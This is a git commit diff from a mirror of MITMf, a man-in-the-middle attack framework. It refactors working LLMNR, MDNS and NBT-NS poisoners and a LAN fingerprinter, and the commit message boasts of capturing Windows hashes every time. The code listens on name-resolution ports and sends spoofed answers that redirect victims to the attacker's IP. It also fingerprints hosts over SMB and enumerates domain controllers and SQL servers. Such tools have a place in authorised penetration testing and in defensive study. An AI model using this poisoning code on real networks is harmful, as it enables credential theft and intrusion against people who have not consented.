mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 13:32:18 -07:00
Responder's MDNS/LLMNR/NBTNS poisoners are back in action (better than ever), only WPAD remains.
Tested against Windows 7 and 8, got hashes 100% of the time! \o/ The rest of the servers will be added in after WPAD is fixed. Next step is to fix the logging... frankly i rather just log everything into the main mitmf.log folder since it's very grep'able. Also the exact output is going to need tweaking, the lines are wayy to long
This commit is contained in:
byt3bl33d3r
parent
7aad9879d1
commit
08b9029a96
7 changed files with 327 additions and 296 deletions
|
|
@ -1,18 +1,29 @@
|
||||||
##################################################################################
|
|
||||||
#Browser Listener and Lanman Finger
|
|
||||||
##################################################################################
|
|
||||||
|
|
||||||
class LANFinger():
|
import socket
|
||||||
|
import threading
|
||||||
|
import struct
|
||||||
|
import logging
|
||||||
|
|
||||||
|
from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
|
||||||
|
from core.configwatcher import ConfigWatcher
|
||||||
|
from core.responder.fingerprinter.RAPLANMANPackets import *
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class LANFingerprinter():
|
||||||
|
|
||||||
|
def start(self, options):
|
||||||
|
|
||||||
|
global args; args = options #For now a quick hack to make argparse's namespace object available to all
|
||||||
|
|
||||||
def serve_thread_udp(host, port, handler):
|
|
||||||
try:
|
try:
|
||||||
server = ThreadingUDPServer((host, port), handler)
|
mitmf_logger.debug("[LANFingerprinter] online")
|
||||||
server.serve_forever()
|
server = ThreadingUDPServer(("0.0.0.0", 138), Browser)
|
||||||
|
t = threading.Thread(name="LANFingerprinter", target=server.serve_forever)
|
||||||
|
t.setDaemon(True)
|
||||||
|
t.start()
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
print "Error starting UDP server on port %s: %s:" % (str(port),str(e))
|
mitmf_logger.error("[LANFingerprinter] Error starting on port 138: {}:".format(e))
|
||||||
|
|
||||||
def start():
|
|
||||||
t1 = threading.Thread(name="Browser", target=serve_thread_udp, args=("0.0.0.0", 138, Browser))
|
|
||||||
|
|
||||||
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
|
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
|
||||||
|
|
||||||
|
|
@ -21,6 +32,34 @@ class ThreadingUDPServer(ThreadingMixIn, UDPServer):
|
||||||
def server_bind(self):
|
def server_bind(self):
|
||||||
UDPServer.server_bind(self)
|
UDPServer.server_bind(self)
|
||||||
|
|
||||||
|
class Browser(BaseRequestHandler):
|
||||||
|
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
request, socket = self.request
|
||||||
|
if args.analyze:
|
||||||
|
ParseDatagramNBTNames(request,self.client_address[0])
|
||||||
|
BecomeBackup(request,self.client_address[0])
|
||||||
|
BecomeBackup(request,self.client_address[0])
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
|
|
||||||
|
def NBT_NS_Role(data):
|
||||||
|
Role = {
|
||||||
|
"\x41\x41\x00":"Workstation/Redirector Service.",
|
||||||
|
"\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller or a homegroup.)",
|
||||||
|
"\x42\x4d\x00":"Domain controller service. This name is a domain controller.",
|
||||||
|
"\x42\x4e\x00":"Local Master Browser.",
|
||||||
|
"\x42\x4f\x00":"Browser Election Service.",
|
||||||
|
"\x43\x41\x00":"File Server Service.",
|
||||||
|
"\x41\x42\x00":"Browser Service.",
|
||||||
|
}
|
||||||
|
|
||||||
|
if data in Role:
|
||||||
|
return Role[data]
|
||||||
|
else:
|
||||||
|
return "Service not known."
|
||||||
|
|
||||||
def WorkstationFingerPrint(data):
|
def WorkstationFingerPrint(data):
|
||||||
Role = {
|
Role = {
|
||||||
"\x04\x00" :"Windows 95",
|
"\x04\x00" :"Windows 95",
|
||||||
|
|
@ -48,7 +87,7 @@ def PrintServerName(data, entries):
|
||||||
l =[]
|
l =[]
|
||||||
for x in ServerName:
|
for x in ServerName:
|
||||||
if WorkstationFingerPrint(x[16:18]):
|
if WorkstationFingerPrint(x[16:18]):
|
||||||
l.append(x[:16].replace('\x00', '')+'\n [-]Os version is:%s'%(WorkstationFingerPrint(x[16:18])))
|
l.append(x[:16].replace('\x00', '')+'| OS:%s'%(WorkstationFingerPrint(x[16:18])))
|
||||||
else:
|
else:
|
||||||
l.append(x[:16].replace('\x00', ''))
|
l.append(x[:16].replace('\x00', ''))
|
||||||
|
|
||||||
|
|
@ -70,18 +109,18 @@ def RAPThisDomain(Client,Domain):
|
||||||
for x in range(1):
|
for x in range(1):
|
||||||
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
|
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
|
||||||
if PDC is not None:
|
if PDC is not None:
|
||||||
l.append('[Analyze mode LANMAN]:')
|
l.append('[LANFingerprinter]')
|
||||||
l.append('[!]Domain detected on this network:')
|
l.append('Domain detected on this network:')
|
||||||
for x in PDC:
|
for x in PDC:
|
||||||
l.append(' -'+x)
|
l.append(' -'+x)
|
||||||
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
|
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
|
||||||
if SQL is not None:
|
if SQL is not None:
|
||||||
l.append('[!]SQL Server detected on Domain %s:'%(Domain))
|
l.append('SQL Server detected on Domain {}:'.format(Domain))
|
||||||
for x in SQL:
|
for x in SQL:
|
||||||
l.append(' -'+x)
|
l.append(' -'+x)
|
||||||
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
|
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
|
||||||
if WKST is not None:
|
if WKST is not None:
|
||||||
l.append('[!]Workstations/Servers detected on Domain %s:'%(Domain))
|
l.append('Workstations/Servers detected on Domain {}:'.format(Domain))
|
||||||
for x in WKST:
|
for x in WKST:
|
||||||
l.append(' -'+x)
|
l.append(' -'+x)
|
||||||
else:
|
else:
|
||||||
|
|
@ -146,11 +185,10 @@ def BecomeBackup(data,Client):
|
||||||
Domain = Decode_Name(data[49:81])
|
Domain = Decode_Name(data[49:81])
|
||||||
Name = Decode_Name(data[15:47])
|
Name = Decode_Name(data[15:47])
|
||||||
Role = NBT_NS_Role(data[45:48])
|
Role = NBT_NS_Role(data[45:48])
|
||||||
Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain)
|
if args.analyze:
|
||||||
if AnalyzeMode:
|
|
||||||
Message1=RAPThisDomain(Client,Domain)
|
Message1=RAPThisDomain(Client,Domain)
|
||||||
logger3.warning(Message1)
|
mitmf_logger.warning(Message1)
|
||||||
logger3.warning(Message)
|
mitmf_logger.warning("[LANFingerprinter] Datagram Request from {} | Hostname: {} via the {} wants to become a Local Master Browser Backup on this domain: {}.".format(Client, Name,Role,Domain))
|
||||||
except:
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
@ -160,24 +198,24 @@ def BecomeBackup(data,Client):
|
||||||
Name = Decode_Name(data[15:47])
|
Name = Decode_Name(data[15:47])
|
||||||
Role1 = NBT_NS_Role(data[45:48])
|
Role1 = NBT_NS_Role(data[45:48])
|
||||||
Role2 = NBT_NS_Role(data[79:82])
|
Role2 = NBT_NS_Role(data[79:82])
|
||||||
Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Name, Role1, Domain, Role2)
|
|
||||||
if Role2 == "Domain controller service. This name is a domain controller." or Role2 == "Browser Election Service." or Role2 == "Local Master Browser.":
|
if Role2 == "Domain controller service. This name is a domain controller." or Role2 == "Browser Election Service." or Role2 == "Local Master Browser.":
|
||||||
if AnalyzeMode:
|
if args.analyze:
|
||||||
Message1=RAPThisDomain(Client,Domain)
|
Message1=RAPThisDomain(Client,Domain)
|
||||||
|
mitmf_logger.warning(Message1)
|
||||||
logger3.warning(Message1)
|
mitmf_logger.warning('[LANFingerprinter] Datagram Request from: {} | Hostname: {} via the {} to {} | Service: {}'.format(Client, Name, Role1, Domain, Role2))
|
||||||
logger3.warning(Message)
|
|
||||||
except:
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
class Browser(BaseRequestHandler):
|
def ParseDatagramNBTNames(data,Client):
|
||||||
|
|
||||||
def handle(self):
|
|
||||||
try:
|
try:
|
||||||
request, socket = self.request
|
Domain = Decode_Name(data[49:81])
|
||||||
if AnalyzeMode:
|
Name = Decode_Name(data[15:47])
|
||||||
ParseDatagramNBTNames(request,self.client_address[0])
|
Role1 = NBT_NS_Role(data[45:48])
|
||||||
BecomeBackup(request,self.client_address[0])
|
Role2 = NBT_NS_Role(data[79:82])
|
||||||
BecomeBackup(request,self.client_address[0])
|
if Role2 == "Domain controller service. This name is a domain controller." or Role2 == "Browser Election Service." or Role2 == "Local Master Browser.":
|
||||||
except Exception:
|
if args.analyze:
|
||||||
|
Message1=RAPThisDomain(Client,Domain)
|
||||||
|
mitmf_logger.warning(Message1)
|
||||||
|
mitmf_logger.warning('[LANFingerprinter] Datagram Request from: {} | Hostname: {} via the {} to {} | Service: {}'.format(Client, Name, Role1, Domain, Role2))
|
||||||
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
@ -1,25 +1,11 @@
|
||||||
import struct
|
import struct
|
||||||
from odict import OrderedDict
|
from core.responder.odict import OrderedDict
|
||||||
|
from core.responder.packet import Packet
|
||||||
|
|
||||||
def longueur(payload):
|
def longueur(payload):
|
||||||
length = struct.pack(">i", len(''.join(payload)))
|
length = struct.pack(">i", len(''.join(payload)))
|
||||||
return length
|
return length
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
|
|
||||||
class SMBHeader(Packet):
|
class SMBHeader(Packet):
|
||||||
fields = OrderedDict([
|
fields = OrderedDict([
|
||||||
("proto", "\xff\x53\x4d\x42"),
|
("proto", "\xff\x53\x4d\x42"),
|
||||||
|
|
|
||||||
|
|
@ -24,11 +24,11 @@ class LLMNRPoisoner:
|
||||||
try:
|
try:
|
||||||
mitmf_logger.debug("[LLMNRPoisoner] OURIP => {}".format(OURIP))
|
mitmf_logger.debug("[LLMNRPoisoner] OURIP => {}".format(OURIP))
|
||||||
server = ThreadingUDPLLMNRServer(("0.0.0.0", 5355), LLMNR)
|
server = ThreadingUDPLLMNRServer(("0.0.0.0", 5355), LLMNR)
|
||||||
t = threading.Thread(name="LLMNR", target=server.serve_forever) #LLMNR
|
t = threading.Thread(name="LLMNRPoisoner", target=server.serve_forever) #LLMNR
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
mitmf_logger.error("[LLMNRPoisoner] Error starting on port {}: {}:".format(5355, e))
|
mitmf_logger.error("[LLMNRPoisoner] Error starting on port 5355: {}:".format(e))
|
||||||
|
|
||||||
class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
|
class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
|
||||||
|
|
||||||
|
|
@ -97,11 +97,11 @@ class LLMNR(BaseRequestHandler):
|
||||||
if args.finger:
|
if args.finger:
|
||||||
try:
|
try:
|
||||||
Finger = RunSmbFinger((self.client_address[0],445))
|
Finger = RunSmbFinger((self.client_address[0],445))
|
||||||
mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,Finger[0],Finger[1]))
|
mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,Finger[0],Finger[1]))
|
||||||
except Exception:
|
except Exception:
|
||||||
mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name))
|
mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {}".format(self.client_address[0], Name))
|
||||||
else:
|
else:
|
||||||
mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name))
|
mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {}".format(self.client_address[0], Name))
|
||||||
|
|
||||||
if DontRespondToSpecificHost(DontRespondTo):
|
if DontRespondToSpecificHost(DontRespondTo):
|
||||||
if RespondToIPScope(DontRespondTo, self.client_address[0]):
|
if RespondToIPScope(DontRespondTo, self.client_address[0]):
|
||||||
|
|
@ -118,15 +118,11 @@ class LLMNR(BaseRequestHandler):
|
||||||
buff.calculate()
|
buff.calculate()
|
||||||
for x in range(1):
|
for x in range(1):
|
||||||
soc.sendto(str(buff), self.client_address)
|
soc.sendto(str(buff), self.client_address)
|
||||||
#mitmf_logger.info(Message)
|
|
||||||
mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0],Name))
|
mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0],Name))
|
||||||
if args.finger:
|
if args.finger:
|
||||||
try:
|
try:
|
||||||
Finger = RunSmbFinger((self.client_address[0],445))
|
Finger = RunSmbFinger((self.client_address[0],445))
|
||||||
#print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0])
|
mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1]))
|
||||||
#print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1])
|
|
||||||
mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0]))
|
|
||||||
mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1]))
|
|
||||||
except Exception:
|
except Exception:
|
||||||
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
|
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
|
||||||
pass
|
pass
|
||||||
|
|
@ -140,10 +136,7 @@ class LLMNR(BaseRequestHandler):
|
||||||
if args.finger:
|
if args.finger:
|
||||||
try:
|
try:
|
||||||
Finger = RunSmbFinger((self.client_address[0],445))
|
Finger = RunSmbFinger((self.client_address[0],445))
|
||||||
#print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0])
|
mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1]))
|
||||||
#print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1])
|
|
||||||
mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0]))
|
|
||||||
mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1]))
|
|
||||||
except Exception:
|
except Exception:
|
||||||
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
|
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
|
||||||
pass
|
pass
|
||||||
|
|
@ -158,10 +151,7 @@ class LLMNR(BaseRequestHandler):
|
||||||
if args.finger:
|
if args.finger:
|
||||||
try:
|
try:
|
||||||
Finger = RunSmbFinger((self.client_address[0],445))
|
Finger = RunSmbFinger((self.client_address[0],445))
|
||||||
#print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0])
|
mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1]))
|
||||||
#print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1])
|
|
||||||
mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0]))
|
|
||||||
mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1]))
|
|
||||||
except Exception:
|
except Exception:
|
||||||
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
|
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
|
||||||
pass
|
pass
|
||||||
|
|
@ -174,8 +164,7 @@ class LLMNR(BaseRequestHandler):
|
||||||
if args.finger:
|
if args.finger:
|
||||||
try:
|
try:
|
||||||
Finger = RunSmbFinger((self.client_address[0],445))
|
Finger = RunSmbFinger((self.client_address[0],445))
|
||||||
mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0]))
|
mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1]))
|
||||||
mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1]))
|
|
||||||
except Exception:
|
except Exception:
|
||||||
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
|
mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
|
||||||
pass
|
pass
|
||||||
|
|
|
||||||
|
|
@ -1,22 +1,33 @@
|
||||||
#! /usr/bin/env python2.7
|
#! /usr/bin/env python2.7
|
||||||
|
|
||||||
from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
|
|
||||||
import threading
|
import threading
|
||||||
|
import socket
|
||||||
import struct
|
import struct
|
||||||
|
import logging
|
||||||
|
|
||||||
from core.protocols.odict import OrderedDict
|
from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
|
||||||
from core.protocols.packet import Packet
|
from core.configwatcher import ConfigWatcher
|
||||||
|
from core.responder.odict import OrderedDict
|
||||||
|
from core.responder.packet import Packet
|
||||||
|
from core.responder.common import *
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
class MDNSPoisoner():
|
class MDNSPoisoner():
|
||||||
|
|
||||||
def start():
|
def start(self, options, ourip):
|
||||||
|
|
||||||
|
global args; args = options
|
||||||
|
global OURIP; OURIP = ourip
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
mitmf_logger.debug("[MDNSPoisoner] OURIP => {}".format(OURIP))
|
||||||
server = ThreadingUDPMDNSServer(("0.0.0.0", 5353), MDNS)
|
server = ThreadingUDPMDNSServer(("0.0.0.0", 5353), MDNS)
|
||||||
t = threading.Thread(name="MDNS", target=server.serve_forever)
|
t = threading.Thread(name="MDNSPoisoner", target=server.serve_forever)
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
print "Error starting MDNSPoisoner on port %s: %s:" % (str(port),str(e))
|
print "[MDNSPoisoner] Error starting on port 5353: {}" .format(e)
|
||||||
|
|
||||||
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
|
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
|
||||||
|
|
||||||
|
|
@ -26,9 +37,8 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
|
||||||
MADDR = "224.0.0.251"
|
MADDR = "224.0.0.251"
|
||||||
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
|
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
|
||||||
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
|
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
|
||||||
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(OURIP))
|
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR)+ socket.inet_aton(OURIP))
|
||||||
|
UDPServer.server_bind(self)
|
||||||
UDPServer.server_bind(self
|
|
||||||
|
|
||||||
class MDNSAns(Packet):
|
class MDNSAns(Packet):
|
||||||
fields = OrderedDict([
|
fields = OrderedDict([
|
||||||
|
|
@ -67,32 +77,34 @@ def Poisoned_MDNS_Name(data):
|
||||||
class MDNS(BaseRequestHandler):
|
class MDNS(BaseRequestHandler):
|
||||||
|
|
||||||
def handle(self):
|
def handle(self):
|
||||||
|
|
||||||
|
ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder']
|
||||||
|
RespondTo = ResponderConfig['RespondTo']
|
||||||
|
|
||||||
MADDR = "224.0.0.251"
|
MADDR = "224.0.0.251"
|
||||||
MPORT = 5353
|
MPORT = 5353
|
||||||
data, soc = self.request
|
data, soc = self.request
|
||||||
if self.client_address[0] == "127.0.0.1":
|
if self.client_address[0] == "127.0.0.1":
|
||||||
pass
|
pass
|
||||||
try:
|
try:
|
||||||
if AnalyzeMode:
|
if args.analyze:
|
||||||
if Parse_IPV6_Addr(data):
|
if Parse_IPV6_Addr(data):
|
||||||
#print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))
|
mitmf_logger.info('[MDNSPoisoner] {} is looking for: {}'.format(self.client_address[0],Parse_MDNS_Name(data)))
|
||||||
responder_logger.info('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
|
|
||||||
|
|
||||||
if RespondToSpecificHost(RespondTo):
|
if RespondToSpecificHost(RespondTo):
|
||||||
if AnalyzeMode == False:
|
if args.analyze == False:
|
||||||
if RespondToIPScope(RespondTo, self.client_address[0]):
|
if RespondToIPScope(RespondTo, self.client_address[0]):
|
||||||
if Parse_IPV6_Addr(data):
|
if Parse_IPV6_Addr(data):
|
||||||
#print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
|
|
||||||
responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
|
mitmf_logger.info('[MDNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0],Parse_MDNS_Name(data)))
|
||||||
Name = Poisoned_MDNS_Name(data)
|
Name = Poisoned_MDNS_Name(data)
|
||||||
MDns = MDNSAns(AnswerName = Name)
|
MDns = MDNSAns(AnswerName = Name)
|
||||||
MDns.calculate()
|
MDns.calculate()
|
||||||
soc.sendto(str(MDns),(MADDR,MPORT))
|
soc.sendto(str(MDns),(MADDR,MPORT))
|
||||||
|
|
||||||
if AnalyzeMode == False and RespondToSpecificHost(RespondTo) == False:
|
if args.analyze == False and RespondToSpecificHost(RespondTo) == False:
|
||||||
if Parse_IPV6_Addr(data):
|
if Parse_IPV6_Addr(data):
|
||||||
#print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
|
mitmf_logger.info('[MDNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0],Parse_MDNS_Name(data)))
|
||||||
responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
|
|
||||||
Name = Poisoned_MDNS_Name(data)
|
Name = Poisoned_MDNS_Name(data)
|
||||||
MDns = MDNSAns(AnswerName = Name)
|
MDns = MDNSAns(AnswerName = Name)
|
||||||
MDns.calculate()
|
MDns.calculate()
|
||||||
|
|
|
||||||
|
|
@ -1,18 +1,34 @@
|
||||||
#! /usr/bin/env python2.7
|
#! /usr/bin/env python2.7
|
||||||
|
|
||||||
from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
|
|
||||||
import threading
|
import threading
|
||||||
|
import socket
|
||||||
import struct
|
import struct
|
||||||
|
import logging
|
||||||
|
|
||||||
|
from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
|
||||||
|
from core.configwatcher import ConfigWatcher
|
||||||
|
from core.responder.fingerprinter.Fingerprint import RunSmbFinger
|
||||||
|
from core.responder.odict import OrderedDict
|
||||||
from core.responder.packet import Packet
|
from core.responder.packet import Packet
|
||||||
|
from core.responder.common import *
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
class NBTNSPoisoner():
|
class NBTNSPoisoner():
|
||||||
|
|
||||||
def start():
|
def start(self, options, ourip):
|
||||||
|
|
||||||
|
global OURIP; OURIP = ourip
|
||||||
|
global args; args = options
|
||||||
|
|
||||||
|
try:
|
||||||
|
mitmf_logger.debug("[NBTNSPoisoner] OURIP => {}".format(ourip))
|
||||||
server = ThreadingUDPServer(("0.0.0.0", 137), NB)
|
server = ThreadingUDPServer(("0.0.0.0", 137), NB)
|
||||||
t = threading.Thread(name="NBNS", target=server.serve_forever()) #NBNS
|
t = threading.Thread(name="NBTNSPoisoner", target=server.serve_forever)
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
except Exception, e:
|
||||||
|
mitmf_logger.debug("[NBTNSPoisoner] Error starting on port 137: {}".format(e))
|
||||||
|
|
||||||
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
|
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
|
||||||
|
|
||||||
|
|
@ -42,17 +58,17 @@ class NBT_Ans(Packet):
|
||||||
def calculate(self,data):
|
def calculate(self,data):
|
||||||
self.fields["Tid"] = data[0:2]
|
self.fields["Tid"] = data[0:2]
|
||||||
self.fields["NbtName"] = data[12:46]
|
self.fields["NbtName"] = data[12:46]
|
||||||
self.fields["IP"] = inet_aton(OURIP)
|
self.fields["IP"] = socket.inet_aton(OURIP)
|
||||||
|
|
||||||
def NBT_NS_Role(data):
|
def NBT_NS_Role(data):
|
||||||
Role = {
|
Role = {
|
||||||
"\x41\x41\x00":"Workstation/Redirector Service.",
|
"\x41\x41\x00":"Workstation/Redirector Service",
|
||||||
"\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller or a homegroup.)",
|
"\x42\x4c\x00":"Domain Master Browser",
|
||||||
"\x42\x4d\x00":"Domain controller service. This name is a domain controller.",
|
"\x42\x4d\x00":"Domain controller service",
|
||||||
"\x42\x4e\x00":"Local Master Browser.",
|
"\x42\x4e\x00":"Local Master Browser",
|
||||||
"\x42\x4f\x00":"Browser Election Service.",
|
"\x42\x4f\x00":"Browser Election Service",
|
||||||
"\x43\x41\x00":"File Server Service.",
|
"\x43\x41\x00":"File Server Service",
|
||||||
"\x41\x42\x00":"Browser Service.",
|
"\x41\x42\x00":"Browser Service",
|
||||||
}
|
}
|
||||||
|
|
||||||
if data in Role:
|
if data in Role:
|
||||||
|
|
@ -62,13 +78,13 @@ def NBT_NS_Role(data):
|
||||||
|
|
||||||
# Define what are we answering to.
|
# Define what are we answering to.
|
||||||
def Validate_NBT_NS(data,Wredirect):
|
def Validate_NBT_NS(data,Wredirect):
|
||||||
if AnalyzeMode:
|
if args.analyze:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
if NBT_NS_Role(data[43:46]) == "File Server Service.":
|
if NBT_NS_Role(data[43:46]) == "File Server Service.":
|
||||||
return True
|
return True
|
||||||
|
|
||||||
if NBTNSDomain == True:
|
if args.nbtns == True:
|
||||||
if NBT_NS_Role(data[43:46]) == "Domain controller service. This name is a domain controller.":
|
if NBT_NS_Role(data[43:46]) == "Domain controller service. This name is a domain controller.":
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
@ -96,6 +112,13 @@ def Decode_Name(nbname):
|
||||||
class NB(BaseRequestHandler):
|
class NB(BaseRequestHandler):
|
||||||
|
|
||||||
def handle(self):
|
def handle(self):
|
||||||
|
|
||||||
|
ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder']
|
||||||
|
DontRespondTo = ResponderConfig['DontRespondTo']
|
||||||
|
DontRespondToName = ResponderConfig['DontRespondToName']
|
||||||
|
RespondTo = ResponderConfig['RespondTo']
|
||||||
|
RespondToName = ResponderConfig['RespondToName']
|
||||||
|
|
||||||
data, socket = self.request
|
data, socket = self.request
|
||||||
Name = Decode_Name(data[13:45])
|
Name = Decode_Name(data[13:45])
|
||||||
|
|
||||||
|
|
@ -106,59 +129,46 @@ class NB(BaseRequestHandler):
|
||||||
if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
|
if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
|
||||||
return None
|
return None
|
||||||
|
|
||||||
if AnalyzeMode:
|
if args.analyze:
|
||||||
if data[2:4] == "\x01\x10":
|
if data[2:4] == "\x01\x10":
|
||||||
if Is_Finger_On(Finger_On_Off):
|
if args.finger:
|
||||||
try:
|
try:
|
||||||
Finger = RunSmbFinger((self.client_address[0],445))
|
Finger = RunSmbFinger((self.client_address[0],445))
|
||||||
Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1])
|
mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested: {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1]))
|
||||||
logger3.warning(Message)
|
|
||||||
except Exception:
|
except Exception:
|
||||||
Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
|
mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested is: {}".format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))
|
||||||
logger3.warning(Message)
